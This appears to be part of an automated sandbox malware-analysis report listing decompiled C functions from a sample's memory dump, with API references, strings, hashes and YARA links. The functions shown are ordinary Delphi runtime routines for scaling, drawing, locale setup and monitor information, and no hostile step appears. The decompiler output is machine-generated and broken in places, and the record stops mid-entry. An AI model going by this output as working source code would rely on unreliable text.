Opcode ID: 50ac3faa65d9bf8917a7dbb5e0254a0d7f6f1681c214fc484fb03e34fba16766
Instruction ID: 9b3a4a6820cd94ae06c46ec8a4a805dd92a5f7564af97d374b957c15bc4db389
Opcode Fuzzy Hash: 50ac3faa65d9bf8917a7dbb5e0254a0d7f6f1681c214fc484fb03e34fba16766
Instruction Fuzzy Hash: 35218E743803007AE320EA24CC8EF5A7AD85F54B1AF1140A5BA097F2D3C6FCE990965C

Uniqueness

Uniqueness Score: -1.00%

Function 004388D8, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004388D8(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x438a84; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x438a7c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x438a84; // 0x0
				if(_t113 != (_t107 &  *0x438a80)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x438a84; // 0x0
				if(_t114 != (_t107 &  *0x438a88)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F26C( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F250( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

0x004388df
0x004388e2
0x004388e4
0x004388e9
0x00438a66
0x00438a66
0x00438a6b
0x00438a78
0x00438a78
0x004388f3
0x004388fd
0x004388f5
0x004388f5
0x004388f5
0x00438906
0x0043891a
0x00438908
0x00438916
0x00438916
0x00438920
0x00438939
0x00438922
0x00438930
0x00438930
0x00438940
0x0043897a
0x0043897d
0x00438948
0x0043894b
0x0043896f
0x00438974
0x0043894d
0x0043895e
0x00438960
0x00438960
0x0043894b
0x00438984
0x00438989
0x004389cd
0x00438991
0x00438999
0x004389c4
0x0043899b
0x004389b0
0x004389b0
0x00438999
0x004389e5
0x004389f3
0x004389fb
0x00438a0e
0x00438a0e
0x00438a1c
0x00438a24
0x00438a37
0x00438a37
0x00438a41
0x00438a61
0x00438a61
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 00438911
MulDiv.KERNEL32(?,?,?), ref: 0043892B
MulDiv.KERNEL32(?,?,?), ref: 00438959
MulDiv.KERNEL32(?,?,?), ref: 0043896F
MulDiv.KERNEL32(?,?,?), ref: 004389A7
MulDiv.KERNEL32(?,?,?), ref: 004389BF
MulDiv.KERNEL32(?,?,0000001F), ref: 00438A09
MulDiv.KERNEL32(?,?,0000001F), ref: 00438A32
MulDiv.KERNEL32(00000000,?,0000001F), ref: 00438A58

Part of subcall function 0041F26C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F279

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb9bc0cfed60d8f2438ab8ec71c49a088dc674c92744079aced1de76ce3ef19
Instruction ID: 052a49027f109bdbea74fea11780eb42fdffda8159d45cf778c627c090aad4d3
Opcode Fuzzy Hash: 0eb9bc0cfed60d8f2438ab8ec71c49a088dc674c92744079aced1de76ce3ef19
Instruction Fuzzy Hash: AE5153B1608740AFC320EB69C945B6BF7EDAF49304F04581EB9D6C7752CA39E844CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004397AC, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004397AC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406E38();
				_v16 = _t33;
				_push(_t92);
				_push(0x4398c7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041F7EC( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x4398ce);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407090();
				return _t72;
			}

0x004397ad
0x004397af
0x004397b5
0x004397c1
0x004397c7
0x004397d7
0x004397de
0x004397df
0x004397e0
0x004397e1
0x004397e2
0x004397c9
0x004397c9
0x004397d0
0x004397d1
0x004397d2
0x004397d3
0x004397d4
0x004397d4
0x004397e8
0x004397eb
0x004397f0
0x004397f2
0x004397f5
0x004397f6
0x004397fb
0x00439800
0x00439801
0x00439806
0x00439809
0x0043981e
0x0043982a
0x00439832
0x0043983f
0x00439861
0x00439880
0x0043989a
0x004398a7
0x004398ae
0x004398b1
0x004398b4
0x004398bc
0x004398bd
0x004398c0
0x004398c1
0x004398c6

APIs

GetDesktopWindow.USER32 ref: 004397E3
7378ACE0.USER32(?,00000000,00000402), ref: 004397F6
SelectObject.GDI32(?,00000000), ref: 00439819
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043983F
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00439861
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00439880
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043989A
SelectObject.GDI32(?,?), ref: 004398A7
7378B380.USER32(?,?,004398CE,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 004398C1

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378ObjectSelect$B380DesktopWindow
String ID:
API String ID: 22433824-0
Opcode ID: 60908d0d594285389da0a0a3cb5a0c49e681993fe6579408db9c9f070288334e
Instruction ID: 10f697c9835ed7b35a3ef1119485ac8593720ca4e0e8d00e39ed6a19d1ea9661
Opcode Fuzzy Hash: 60908d0d594285389da0a0a3cb5a0c49e681993fe6579408db9c9f070288334e
Instruction Fuzzy Hash: 6231FBB6E00219AFDB00DEEDCC85DAFBBBCAF49704F414565B514F7281C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF50, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AF50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b21b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040ADDC();
				E004099F0(__ebx, __edi, __esi);
				_t196 =  *0x48f7fc;
				if( *0x48f7fc != 0) {
					E00409BC8(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409940(_t43, 0, 0x14,  &_v20);
				E00404374(0x48f730, _v20);
				E00409940(_t43, 0x40b230, 0x1b,  &_v24);
				 *0x48f734 = E00408740(0x40b230, 0, _t196);
				E00409940(_t132, 0x40b230, 0x1c,  &_v28);
				 *0x48f735 = E00408740(0x40b230, 0, _t196);
				 *0x48f736 = E0040998C(_t132, 0x2c, 0xf);
				 *0x48f737 = E0040998C(_t132, 0x2e, 0xe);
				E00409940(_t132, 0x40b230, 0x19,  &_v32);
				 *0x48f738 = E00408740(0x40b230, 0, _t196);
				 *0x48f739 = E0040998C(_t132, 0x2f, 0x1d);
				E00409940(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409C78(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404374(0x48f73c, _v36);
				E00409940(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409C78(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404374(0x48f740, _v44);
				 *0x48f744 = E0040998C(_t132, 0x3a, 0x1e);
				E00409940(_t132, 0x40b264, 0x28,  &_v52);
				E00404374(0x48f748, _v52);
				E00409940(_t132, 0x40b270, 0x29,  &_v56);
				E00404374(0x48f74c, _v56);
				E00404320( &_v12);
				E00404320( &_v16);
				E00409940(_t132, 0x40b230, 0x25,  &_v60);
				_t104 = E00408740(0x40b230, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043B8( &_v8, 0x40b288);
				} else {
					E004043B8( &_v8, 0x40b27c);
				}
				E00409940(_t132, 0x40b230, 0x23,  &_v64);
				_t111 = E00408740(0x40b230, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409940(_t132, 0x40b230, 0x1005,  &_v68);
					if(E00408740(0x40b230, 0, _t198) != 0) {
						E004043B8( &_v12, 0x40b2a4);
					} else {
						E004043B8( &_v16, 0x40b294);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404698();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404698();
				 *0x48f7fe = E0040998C(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B222);
				return E00404344( &_v68, 0x10);
			}

0x0040af50
0x0040af50
0x0040af51
0x0040af53
0x0040af58
0x0040af58
0x0040af5a
0x0040af5c
0x0040af5c
0x0040af5f
0x0040af62
0x0040af63
0x0040af68
0x0040af6b
0x0040af6e
0x0040af73
0x0040af78
0x0040af7f
0x0040af81
0x0040af81
0x0040af8b
0x0040af9a
0x0040afa7
0x0040afbc
0x0040afcb
0x0040afe0
0x0040afef
0x0040b002
0x0040b015
0x0040b02a
0x0040b039
0x0040b04c
0x0040b061
0x0040b06c
0x0040b079
0x0040b08e
0x0040b099
0x0040b0a6
0x0040b0b9
0x0040b0ce
0x0040b0db
0x0040b0f0
0x0040b0fd
0x0040b105
0x0040b10d
0x0040b122
0x0040b12c
0x0040b131
0x0040b133
0x0040b14c
0x0040b135
0x0040b13d
0x0040b13d
0x0040b161
0x0040b16b
0x0040b170
0x0040b172
0x0040b184
0x0040b195
0x0040b1ae
0x0040b197
0x0040b19f
0x0040b19f
0x0040b195
0x0040b1b3
0x0040b1b6
0x0040b1b9
0x0040b1be
0x0040b1cb
0x0040b1d0
0x0040b1d3
0x0040b1d6
0x0040b1db
0x0040b1e8
0x0040b1fb
0x0040b202
0x0040b205
0x0040b208
0x0040b21a

APIs

GetThreadLocale.KERNEL32(00000000,0040B21B,?,?,00000000,00000000), ref: 0040AF86

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Strings

m/d/yy, xrefs: 0040B055
mmmm d, yyyy, xrefs: 0040B082
AMPM , xrefs: 0040B1A9
:mm:ss, xrefs: 0040B1D6
AMPM, xrefs: 0040B19A
:mm, xrefs: 0040B1B9

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: b2e8206069406c15c65b90cc8addb827f1f800e5ff77e72f2c4b474668f0a451
Instruction ID: 273a09859218ce63f1bfafcae5f04ae87a68ef2a4600b148fab80dafd7ffe561
Opcode Fuzzy Hash: b2e8206069406c15c65b90cc8addb827f1f800e5ff77e72f2c4b474668f0a451
Instruction Fuzzy Hash: CC611C707002089BDB01FBA5D881A9F76A6DB98304F50947FA641BB7C6DB3CDD0A879D

Uniqueness

Uniqueness Score: -1.00%

Function 00458D9C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00458DAF
GetWindowRect.USER32 ref: 00458E09
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 00458E41
MessageBoxA.USER32 ref: 00458E82
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00458EF8,?,00000000,00458EF1), ref: 00458ED2
SetActiveWindow.USER32(?,00458EF8,?,00000000,00458EF1), ref: 00458EE3

Strings

(, xrefs: 00458DE6

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: bb7b641037468d0aa0f14dd517f3210ed0a3fb8b6c72f816e43f4588c51c043c
Instruction ID: 1d93de7175724da21c6f79ece6a8f35b9b607821a3a8e229c81cba6dd8a53d00
Opcode Fuzzy Hash: bb7b641037468d0aa0f14dd517f3210ed0a3fb8b6c72f816e43f4588c51c043c
Instruction Fuzzy Hash: FB412B75E00108AFDB04DBA9DD82FAEB7F9EB48305F544469F904FB392DA78AD048B54

Uniqueness

Uniqueness Score: -1.00%

Function 00422B40, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422B40(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E004229DC(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421384( &_v38) != _v18) {
					E00420534();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422caf, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420534();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420534();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x422cb6);
				return E0040274C(_v16);
			}

0x00422b41
0x00422b43
0x00422b4c
0x00422b4f
0x00422b52
0x00422b56
0x00422b68
0x00422b72
0x00422b82
0x00422b82
0x00422b87
0x00422b93
0x00422b96
0x00422ba4
0x00422bb2
0x00422bbc
0x00422bc5
0x00422bc7
0x00422bc7
0x00422be7
0x00422c04
0x00422c07
0x00422c10
0x00422c15
0x00422c1a
0x00422c30
0x00422c32
0x00422c37
0x00422c39
0x00422c39
0x00422c4b
0x00422c50
0x00422c5a
0x00422c60
0x00422c65
0x00422c6c
0x00422c84
0x00422c86
0x00422c8b
0x00422c8d
0x00422c8d
0x00422c92
0x00422c98
0x00422c9b
0x00422c9e
0x00422cae

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BE2
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BFF
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C2B
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C4B
DeleteEnhMetaFile.GDI32(00000016), ref: 00422C6C
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422C7F

Strings

`, xrefs: 00422BC7

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 9b867f333f1f564f642fcd9f62278e86d6935eb2a94e92128bebbecc616af6ef
Instruction ID: dbb885034a11e416cf359662c0241dfb07ced1ea5db72ea36fee94960fa49253
Opcode Fuzzy Hash: 9b867f333f1f564f642fcd9f62278e86d6935eb2a94e92128bebbecc616af6ef
Instruction Fuzzy Hash: AC415EB5E00218AFDB00DFA9D585AAFB7F8EF48710F50846AF904E7241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00426CD4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00426CD4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac0 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					 *0x48faa4 = E004269A4(4, _t23,  *0x48faa4, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x00426cdd
0x00426ce0
0x00426cea
0x00426d0f
0x00426d17
0x00426d37
0x00426d3c
0x00426d47
0x00426d52
0x00426d5c
0x00426d5d
0x00426d5e
0x00426d5f
0x00426d60
0x00426d61
0x00426d6b
0x00426d6d
0x00426d75
0x00426d76
0x00426d76
0x00426d7b
0x00426d7b
0x00426cec
0x00426cfe
0x00426d0b
0x00426d0b
0x00426d85

APIs

GetMonitorInfoA.USER32(?,?), ref: 00426D05
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426D2C
GetSystemMetrics.USER32 ref: 00426D41
GetSystemMetrics.USER32 ref: 00426D4C
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426D76

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

DISPLAY, xrefs: 00426D6D
GetMonitorInfo, xrefs: 00426CEC

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 442bf4c7b27feae412d6deafb1840d3d16e016222d5d5be792021c47c23c3196
Instruction ID: 70329c667c102f1d1686fafe4f663fbfb876fa39692c13fdff9f80d6ee16b7cd
Opcode Fuzzy Hash: 442bf4c7b27feae412d6deafb1840d3d16e016222d5d5be792021c47c23c3196
Instruction Fuzzy Hash: 061103317207285FD7208F60AC407ABB7E8EF45720F41493EEC5ADB6D0D774A8488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00426E7C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00426E7C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac2 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x48faac; // 0x426e7c
					 *0x48faac = E004269A4(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x48faac(_t27, _t29);
				}
				return _t24;
			}

0x00426e85
0x00426e88
0x00426e92
0x00426eb7
0x00426ebf
0x00426edf
0x00426ee4
0x00426eef
0x00426efa
0x00426f04
0x00426f05
0x00426f06
0x00426f07
0x00426f08
0x00426f09
0x00426f13
0x00426f15
0x00426f1d
0x00426f1e
0x00426f1e
0x00426f23
0x00426f23
0x00426e94
0x00426e99
0x00426ea6
0x00426eb3
0x00426eb3
0x00426f2d

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426ED4
GetSystemMetrics.USER32 ref: 00426EE9
GetSystemMetrics.USER32 ref: 00426EF4
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426F1E

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

|nB, xrefs: 00426E99, 00426EA6, 00426EAD
DISPLAY, xrefs: 00426F15
GetMonitorInfoW, xrefs: 00426E94

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$|nB
API String ID: 2545840971-1846980206
Opcode ID: c87b940dbd07c2bfcf89ac0dc78d6044fa41d1b97f3d01697760af4b7d25a718
Instruction ID: 7ee13f8ede422b036e26cfe3dbe816272876cafd8fc96b7b8b8928e94d75882a
